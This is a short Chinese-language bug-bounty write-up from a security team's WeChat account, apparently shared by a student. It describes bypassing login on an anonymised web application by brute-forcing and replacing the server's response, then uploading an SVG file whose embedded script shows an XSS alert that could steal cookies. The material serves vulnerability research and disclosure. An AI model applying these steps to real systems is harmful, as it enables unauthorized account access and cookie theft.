声明:由于传播、利用本公众号湘安无事所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!本文来自内部学员的分享报告。
昨天带着
以111111为账号,对密码进行爆破,任意选择一个返回包statusCode参数为200的包,将响应头及响应体进行替换到刚才抓到的登录的返回包里,一直放包,得以绕过机制认证,获取到账号权限
访问
https://x.x.x.x/app.Client/index.jsp?m=client&c=Complain&a=showComplain&mainTypeId=2
,最下面有上传文件的地方,上传svg文件,POC为
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("SVG XSS");
</script>
</svg>
可实现弹出控制台打印,或者跳转
拼接返回文件路径,造成弹窗,可获取用户cookie
本文由学员投稿而成
我们湘安无事团队长期专注于教育漏洞平台,积累了丰富的经验和深厚的专业知识。目前取得的成绩有edu-src平台团队第二名,漏洞盒子团队排行榜第二名,带领很多同学和学员挖到了证书或者赏金漏洞,后面会收集并上传到纷传,也欢迎各位同学加入edu团队与深情的带头大哥或者成员交流。
微信群请加下放wx